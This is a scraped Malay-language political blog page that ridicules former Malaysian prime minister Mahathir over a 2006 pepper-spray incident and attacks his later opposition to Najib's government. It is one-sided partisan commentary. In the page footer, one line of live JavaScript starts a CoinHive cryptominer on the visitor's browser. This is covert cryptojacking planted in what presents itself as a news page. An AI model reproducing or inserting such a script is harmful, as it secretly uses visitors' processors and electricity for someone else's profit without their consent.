© Copyright 2017, All Rights Reserved
Home / Politik / Mahathir Satu-Satunya PM Pencen Yang Kena Sembur Dengan Serbuk Lada

Mahathir Satu-Satunya PM Pencen Yang Kena Sembur Dengan Serbuk Lada

Zaman pentadbiran Tun Dr Mahathir Mohamad dahulu tidak pernah sunyi daripada pelbagai kontroversi. Kesemua kontroversi ini tidak pernah padam sehinggalah dia akhirnya meletakkan jawatannya sebagai Perdana Menteri dan Presiden UMNO pada thaun 2003. Apa yang berlaku pada zamannya terus menjadi sebutan dan terus dibangkitkan walaupun dia telahpun meletakkan jawatan.

Jika kita masih ingat bagaimana Mahathir pernah disembur dengan serbuk lada sebaik sahaja tiba di Lapangan Terbang Sultan Ismail Petra, Kota Bharu, Kelantan. Semuanya gara-gara perebutan dua orang Datuk untuk mendapatkanya semasa penentangan awal Mahathir terhadap Tun Abdullah Ahmad Badawi pada 2006.

Malah, lebih melucukan, dia adalah satu-satunya bekas Perdana Menteri yang menerima semburan lada oleh penyokongnya sendiri. Lihat sahaja bagaimana Tunku Abdul Rahman, Tun Hussien Onn dan Tun Abdullah Ahmad Badawi, kesemua mereka langsung tidak menerima sebarang semburan lada atau apa sahaja objek yang disasarkan kepada mereka.

Hanya Mahathir sahaja yang menerima nasib malang sewaktu dia sendiri membawa niat busuknya untuk menjatuhkan orang yang dia sendiri lantik bagi menggantikannya. Tidakkah Mahathir belajar dari tragedi berkenaan di mana dia telah dimasukkan kehospital kerana bimbangkan kesihaatan matanya?

Jika dilihat dari tindak tanduknya hari ini, bukan satu perkara yang menghairankan sekiranya masih ada yang menyimppan hajat untuk melakukan semburan lada itu lagi terhadapnya. Ini kerana, walaupun sudah berumur 92 tahun, sikapnya hari ini disifatkan ramai sebagai mengkhianati perjuangan yang pernah dia asaskan satu ketika dahulu.

Mahathir hari ini sanggup menyembah musuh ketat politik dan kaum Melayu, DAP hanya kerana mahu menjatuhkan kedudukan kerajaan dan Datuk Seri Mohd Najib. Ini sekaligus melanggar ikrarnya yang tidak akan mencampuri urusan pentadbiran negara selepas dia bersara pada 2003.

Mahathir tetap Mahathir. Walaupun sudah menerima kifarah atas niat busuknya mahu menjatuhkan Tun Abdullah Ahmad Badawi, namun ianya langsung tidak menginsafkannya. Apapun, Mahathir telah berjaya mencatatkan rekod baru iaitu satu-satunya Perdana Menteri pencen menerima semburan lada oleh para penyokongnya sendiri.

Comments


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Mempengerusikan Mesyuarat Peringkat Tinggi Mengenai Pasukan Petugas Khas Sekolah-sekolah Tahfiz

PUTRAJAYA, 19 Sept — Timbalan Perdana Menteri Datuk Seri Dr Ahmad Zahid ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();